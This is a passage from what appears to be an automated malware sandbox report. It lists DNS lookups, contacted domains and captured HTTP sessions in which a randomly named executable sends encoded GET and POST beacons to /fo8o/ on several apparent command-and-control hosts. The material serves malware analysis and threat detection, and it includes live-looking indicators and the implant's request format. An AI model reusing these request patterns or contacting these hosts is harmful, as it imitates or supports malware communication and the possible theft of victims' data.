                                          Aug 30, 2024 09:40:36.715199947 CEST1.1.1.1192.168.2.40x885cName error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:44.880317926 CEST1.1.1.1192.168.2.40x3407No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                          Aug 30, 2024 09:40:44.880317926 CEST1.1.1.1192.168.2.40x3407No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                          Aug 30, 2024 09:40:44.880317926 CEST1.1.1.1192.168.2.40x3407No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:41:58.250551939 CEST1.1.1.1192.168.2.40x6dabNo error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:42:11.895972967 CEST1.1.1.1192.168.2.40xda93No error (0)www.liangyuen528.com15.197.212.58A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:42:25.111083031 CEST1.1.1.1192.168.2.40x10b5No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:42:38.809495926 CEST1.1.1.1192.168.2.40x5f2eNo error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                          Aug 30, 2024 09:42:38.809495926 CEST1.1.1.1192.168.2.40x5f2eNo error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:42:52.139580011 CEST1.1.1.1192.168.2.40xd895No error (0)www.donnavariedades.com15.197.240.20A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:43:05.421667099 CEST1.1.1.1192.168.2.40x1431Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:43:13.931818008 CEST1.1.1.1192.168.2.40x5736No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                          Aug 30, 2024 09:43:13.931818008 CEST1.1.1.1192.168.2.40x5736No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.3xfootball.com
                                          • www.kasegitai.tokyo
                                          • www.goldenjade-travel.com
                                          • www.magmadokum.com
                                          • www.rssnewscast.com
                                          • www.liangyuen528.com
                                          • www.techchains.info
                                          • www.elettrosistemista.zip
                                          • www.donnavariedades.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449736154.215.72.110803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:39:50.605926991 CEST508OUTGET /fo8o/?elJtehkH=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&z8_=glwH5BKp HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Host: www.3xfootball.com
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Aug 30, 2024 09:39:51.496270895 CEST691INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Fri, 30 Aug 2024 07:39:51 GMT
                                          Content-Type: text/html
                                          Content-Length: 548
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.44973854.65.172.3803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:07.880949020 CEST782OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.kasegitai.tokyo
                                          Origin: http://www.kasegitai.tokyo
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 205
                                          Referer: http://www.kasegitai.tokyo/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 6b 32 76 35 52 35 2f 76 72 4d 41 46 48 55 74 46 78 65 6f 65 77 36 43 2b 6b 42 51 62 2f 41 4c 52 41 3d 3d
                                          Data Ascii: elJtehkH=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffk2v5R5/vrMAFHUtFxeoew6C+kBQb/ALRA==
                                          Aug 30, 2024 09:40:08.771903992 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 30 Aug 2024 07:40:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Data Raw: 36 63 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 57 ef 6f db c6 19 fe 2c ff 15 57 a2 88 a4 42 22 6d c7 31 94 58 52 91 a2 c9 1a a0 3f 3e 24 45 07 18 86 71 22 4f d4 59 47 1e c3 3b 59 56 12 03 26 95 66 71 92 2e 59 db 79 68 da a2 f5 9a a5 5b 0a 38 c3 9a 16 5d e3 d5 ff cb 2e b2 93 4f f9 17 f6 1e 29 59 92 ed b5 29 b6 0f a2 c8 f7 de 7b de f7 7d 9e f7 8e c7 89 f2 4b 0e b7 65 27 20 a8 21 3d 56 9d 28 eb 3f c4 b0 ef 56 8c a5 c0 d0 06 82 9d ea 44 a6 ec 11 89 91 dd c0 a1 20 b2 62 bc 7b e1 6c b1 64 ec db 7d ec 91 8a b1 4c 49 3b e0 a1 34 90 cd 7d 49 7c f0 6b 53 47 36 2a 0e 59 a6 36 29 26 0f 05 44 7d 2a 29 66 45 61 63 46 2a 53 05 e4 e1 15 ea b5 bc a1 a1 25 48 98 3c e1 1a 18 7c 9e 04 92 54 32 52 9d 99 3c 8e ce f2 b0 46 1d 87 f8 65 2b 35 c2 28 a3 7e 13 85 84 55 0c 21 3b 8c 88 06 21 90 87 ae ac 62 48 b2 22 2d 5b 08 03 35 42 52 ef 7b 98 da a0 67 be 54 2c 8e 16 11 f2 1a 97 62 a4 04 9f 53 df 21 2b 06 b2 aa c5 62 7f c2 3c ad 23 57 12 74 ee 0c 3a b9 a0 6d 09 e4 c1 70 30 90 31 dd 10 3b 14 80 d0 65 78 ca d4 29 93 24 3c 85 7c [TRUNCATED]
                                          Data Ascii: 6c3Wo,WB"m1XR?>$Eq"OYG;YV&fq.Yyh[8].O)Y){}Ke' !=V(?VD b{ld}LI;4}I|kSG6*Y6)&D}*)fEacF*S%H<|T2R<Fe+5(~U!;!bH"-[5BR{gT,bS!+b<#Wt:mp01;ex)$<|90\+ l'A6BTvqIBc7;|"Oq8eYv9aj|\W]|AVEt{aZ'j'pilTVO7"7MP"?}\-h.08{?uo5K]2fI.7_f]cH38NAd%Hx$IXBe`kbA\*15@U=*RTPE*wUZ*Zu7T]2kOH):{3FpXdm,HEnwo}G2TTUtUgx#Q4$!:,^Ab6HHL]:O.&_!i9,6~{[wTofBi|!w?Dnh>G TzO{,/hOzgv?[6gR1U'- `>xot1uvTk'UdMz!M:{ [TRUNCATED]
                                          Aug 30, 2024 09:40:08.771929026 CEST712INData Raw: b5 3c f9 d7 ce a0 17 77 80 88 c1 56 f1 73 e1 67 66 fd 99 4b ad e9 17 0f 3f fd eb c3 0f fa 29 53 6e b1 01 3d 58 ea d7 0a e5 fe 22 a3 42 f6 49 62 b4 9a ee 24 63 c0 a0 42 7c 5d eb fa 63 b7 f7 87 1b fd 1d a5 6c 81 f3 f8 a4 de 0e ec 05 77 13 71 e2 61
                                          Data Ascii: <wVsgfK?)Sn=X"BIb$cB|]clwqaD[}1!u[o*n>zy"?:l:(9wW/.qw)QktqlI;LT^$a-]lczSNS)&2N ee^llp<1u9]@


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.44973954.65.172.3803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:10.427617073 CEST802OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.kasegitai.tokyo
                                          Origin: http://www.kasegitai.tokyo
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 225
                                          Referer: http://www.kasegitai.tokyo/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 65 78 6a 6a 49 6b 57 38 39 43 4b 4d 5a 66 4e 68 42 64 6f 35 63 66 67 68 47 53 52 76 49 54 58 39 30 3d
                                          Data Ascii: elJtehkH=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwexjjIkW89CKMZfNhBdo5cfghGSRvITX90=
                                          Aug 30, 2024 09:40:11.312846899 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 30 Aug 2024 07:40:11 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Data Raw: 36 63 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 57 ef 6f db c6 19 fe 2c ff 15 57 a2 88 a4 42 22 6d c7 31 94 58 52 91 a2 c9 1a a0 3f 3e 24 45 07 18 86 71 22 4f d4 59 47 1e c3 3b 59 56 12 03 26 95 66 71 92 2e 59 db 79 68 da a2 f5 9a a5 5b 0a 38 c3 9a 16 5d e3 d5 ff cb 2e b2 93 4f f9 17 f6 1e 29 59 92 ed b5 29 b6 0f a2 c8 f7 de 7b de f7 7d 9e f7 8e c7 89 f2 4b 0e b7 65 27 20 a8 21 3d 56 9d 28 eb 3f c4 b0 ef 56 8c a5 c0 d0 06 82 9d ea 44 a6 ec 11 89 91 dd c0 a1 20 b2 62 bc 7b e1 6c b1 64 ec db 7d ec 91 8a b1 4c 49 3b e0 a1 34 90 cd 7d 49 7c f0 6b 53 47 36 2a 0e 59 a6 36 29 26 0f 05 44 7d 2a 29 66 45 61 63 46 2a 53 05 e4 e1 15 ea b5 bc a1 a1 25 48 98 3c e1 1a 18 7c 9e 04 92 54 32 52 9d 99 3c 8e ce f2 b0 46 1d 87 f8 65 2b 35 c2 28 a3 7e 13 85 84 55 0c 21 3b 8c 88 06 21 90 87 ae ac 62 48 b2 22 2d 5b 08 03 35 42 52 ef 7b 98 da a0 67 be 54 2c 8e 16 11 f2 1a 97 62 a4 04 9f 53 df 21 2b 06 b2 aa c5 62 7f c2 3c ad 23 57 12 74 ee 0c 3a b9 a0 6d 09 e4 c1 70 30 90 31 dd 10 3b 14 80 d0 65 78 ca d4 29 93 24 3c 85 7c [TRUNCATED]
                                          Data Ascii: 6c3Wo,WB"m1XR?>$Eq"OYG;YV&fq.Yyh[8].O)Y){}Ke' !=V(?VD b{ld}LI;4}I|kSG6*Y6)&D}*)fEacF*S%H<|T2R<Fe+5(~U!;!bH"-[5BR{gT,bS!+b<#Wt:mp01;ex)$<|90\+ l'A6BTvqIBc7;|"Oq8eYv9aj|\W]|AVEt{aZ'j'pilTVO7"7MP"?}\-h.08{?uo5K]2fI.7_f]cH38NAd%Hx$IXBe`kbA\*15@U=*RTPE*wUZ*Zu7T]2kOH):{3FpXdm,HEnwo}G2TTUtUgx#Q4$!:,^Ab6HHL]:O.&_!i9,6~{[wTofBi|!w?Dnh>G TzO{,/hOzgv?[6gR1U'- `>xot1uvTk'UdMz!M:{ [TRUNCATED]
                                          Aug 30, 2024 09:40:11.313026905 CEST712INData Raw: b5 3c f9 d7 ce a0 17 77 80 88 c1 56 f1 73 e1 67 66 fd 99 4b ad e9 17 0f 3f fd eb c3 0f fa 29 53 6e b1 01 3d 58 ea d7 0a e5 fe 22 a3 42 f6 49 62 b4 9a ee 24 63 c0 a0 42 7c 5d eb fa 63 b7 f7 87 1b fd 1d a5 6c 81 f3 f8 a4 de 0e ec 05 77 13 71 e2 61
                                          Data Ascii: <wVsgfK?)Sn=X"BIb$cB|]clwqaD[}1!u[o*n>zy"?:l:(9wW/.qw)QktqlI;LT^$a-]lczSNS)&2N ee^llp<1u9]@


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.44974054.65.172.3803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:13.269438982 CEST10884OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.kasegitai.tokyo
                                          Origin: http://www.kasegitai.tokyo
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 10305
                                          Referer: http://www.kasegitai.tokyo/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 45 2f 41 56 6c 75 46 45 76 61 66 47 4f 43 31 45 6b 56 61 66 56 31 48 2b 49 6b 4b 6a 68 5a 72 59 41 53 6f 78 58 6e 57 4e 73 70 4e 62 64 62 47 57 4e 35 33 62 32 47 63 2f 57 71 46 6a 52 35 78 62 6d 48 78 65 69 51 6f 32 45 61 62 30 4a 6f 6c 4f 46 4c 6a 49 79 41 39 63 5a 55 6e 30 69 63 4e 4b 39 46 70 65 44 4d 2f 58 63 41 66 31 7a 55 6b 4b 6c 74 53 33 51 39 4f 77 63 50 73 51 2b 4b 64 72 2b 43 67 79 56 64 4e 6f 34 7a 61 34 53 77 2f 51 48 50 47 47 66 41 6a 77 2b 59 35 35 64 76 4e [TRUNCATED]
                                          Data Ascii: elJtehkH=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLE/AVluFEvafGOC1EkVafV1H+IkKjhZrYASoxXnWNspNbdbGWN53b2Gc/WqFjR5xbmHxeiQo2Eab0JolOFLjIyA9cZUn0icNK9FpeDM/XcAf1zUkKltS3Q9OwcPsQ+Kdr+CgyVdNo4za4Sw/QHPGGfAjw+Y55dvNtC2YSNKuic7DQ4iT10QiVGqckJQbm6DPegwCtQhh4WulBqAacvsxY0a25Y9+zKUG42yNoXu4ju9sCZFNk1lo0dI6YGfF7/7H3q5adljciPwCW0kX3jvCkD4q9ZyRURKthdoV+r6cFVopM4tjtEZ01s/uaCQjzX3CGhw9Z/EwzaXMbjVj3kmand6EKtPtlotVVt88vpW9UKsTvFUbX5N1nmx7t4/a3VvYweWor/WOi06Rk679nfIQyaqy0YvK1wXWY/o6AHs0Qnp7/8xH78mkUla2F0anUuagmvBhC77HuZSxJuhrC/HRg+eEaW9YUQfnRKXqbpcapSDPQSeUMG8Lv8mJc+p9Ia4Ckiv8hFCwjXNrYvmc9IryWuOR/a9h+FqGAtlXV/VoH5eEIUyA0EMOWB9H39laXgFTtbkjBSNff+dSlM/eSBogxiJlRoo1pfQwArK1QHPu5cB0fcPAq6xDOsbIFlvTHPx0/lYNGF5QkZc2aEpzKwBA3FZ8bMwpfNq9gcj7IP2zYKFJAn8e6fw6J0/+SJ12DfczYIn+71Nl2vvePwPNSGlvEeoGhUEXf3D7NbEDvJJ/Q3ydB1Ham2F/YxVmD0vBYS9xfXRQZlJQ/s4WtM6ws4fVszi6kwVQiwWo5oAyOzZhAjdjlX6dmvvac3JAF8pv759C6Q [TRUNCATED]
                                          Aug 30, 2024 09:40:14.188205004 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 30 Aug 2024 07:40:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Data Raw: 36 63 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 57 ef 6f db c6 19 fe 2c ff 15 57 a2 88 a4 42 22 6d c7 31 94 58 52 91 a2 c9 1a a0 3f 3e 24 45 07 18 86 71 22 4f d4 59 47 1e c3 3b 59 56 12 03 26 95 66 71 92 2e 59 db 79 68 da a2 f5 9a a5 5b 0a 38 c3 9a 16 5d e3 d5 ff cb 2e b2 93 4f f9 17 f6 1e 29 59 92 ed b5 29 b6 0f a2 c8 f7 de 7b de f7 7d 9e f7 8e c7 89 f2 4b 0e b7 65 27 20 a8 21 3d 56 9d 28 eb 3f c4 b0 ef 56 8c a5 c0 d0 06 82 9d ea 44 a6 ec 11 89 91 dd c0 a1 20 b2 62 bc 7b e1 6c b1 64 ec db 7d ec 91 8a b1 4c 49 3b e0 a1 34 90 cd 7d 49 7c f0 6b 53 47 36 2a 0e 59 a6 36 29 26 0f 05 44 7d 2a 29 66 45 61 63 46 2a 53 05 e4 e1 15 ea b5 bc a1 a1 25 48 98 3c e1 1a 18 7c 9e 04 92 54 32 52 9d 99 3c 8e ce f2 b0 46 1d 87 f8 65 2b 35 c2 28 a3 7e 13 85 84 55 0c 21 3b 8c 88 06 21 90 87 ae ac 62 48 b2 22 2d 5b 08 03 35 42 52 ef 7b 98 da a0 67 be 54 2c 8e 16 11 f2 1a 97 62 a4 04 9f 53 df 21 2b 06 b2 aa c5 62 7f c2 3c ad 23 57 12 74 ee 0c 3a b9 a0 6d 09 e4 c1 70 30 90 31 dd 10 3b 14 80 d0 65 78 ca d4 29 93 24 3c 85 7c [TRUNCATED]
                                          Data Ascii: 6c3Wo,WB"m1XR?>$Eq"OYG;YV&fq.Yyh[8].O)Y){}Ke' !=V(?VD b{ld}LI;4}I|kSG6*Y6)&D}*)fEacF*S%H<|T2R<Fe+5(~U!;!bH"-[5BR{gT,bS!+b<#Wt:mp01;ex)$<|90\+ l'A6BTvqIBc7;|"Oq8eYv9aj|\W]|AVEt{aZ'j'pilTVO7"7MP"?}\-h.08{?uo5K]2fI.7_f]cH38NAd%Hx$IXBe`kbA\*15@U=*RTPE*wUZ*Zu7T]2kOH):{3FpXdm,HEnwo}G2TTUtUgx#Q4$!:,^Ab6HHL]:O.&_!i9,6~{[wTofBi|!w?Dnh>G TzO{,/hOzgv?[6gR1U'- `>xot1uvTk'UdMz!M:{ [TRUNCATED]
                                          Aug 30, 2024 09:40:14.188229084 CEST712INData Raw: b5 3c f9 d7 ce a0 17 77 80 88 c1 56 f1 73 e1 67 66 fd 99 4b ad e9 17 0f 3f fd eb c3 0f fa 29 53 6e b1 01 3d 58 ea d7 0a e5 fe 22 a3 42 f6 49 62 b4 9a ee 24 63 c0 a0 42 7c 5d eb fa 63 b7 f7 87 1b fd 1d a5 6c 81 f3 f8 a4 de 0e ec 05 77 13 71 e2 61
                                          Data Ascii: <wVsgfK?)Sn=X"BIb$cB|]clwqaD[}1!u[o*n>zy"?:l:(9wW/.qw)QktqlI;LT^$a-]lczSNS)&2N ee^llp<1u9]@


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.44974154.65.172.3803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:15.805602074 CEST509OUTGET /fo8o/?elJtehkH=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&z8_=glwH5BKp HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Host: www.kasegitai.tokyo
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Aug 30, 2024 09:40:16.681288958 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 30 Aug 2024 07:40:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 64 63 66 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 21 2d 2d 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 79 6c [TRUNCATED]
                                          Data Ascii: dcf<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>403 Forbidden</title><link rel="stylesheet" type="text/css" href="style.css">...<meta name="robots" content="noindex" />-->...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]--></head>...<body class="blackboard">--><body class="tokyo1"><a href="https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886" target="_blank" class="bnrLink"><img src="https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png" alt=""></a><div class="invalid"><h1><img src="img/img01.png" alt=""><p>403 Forbidden</p></h1>...<div><p class="txt01"> <span>www.kasegitai.tokyo</span> <br><a href="https://www.value-domain.com/mod [TRUNCATED]
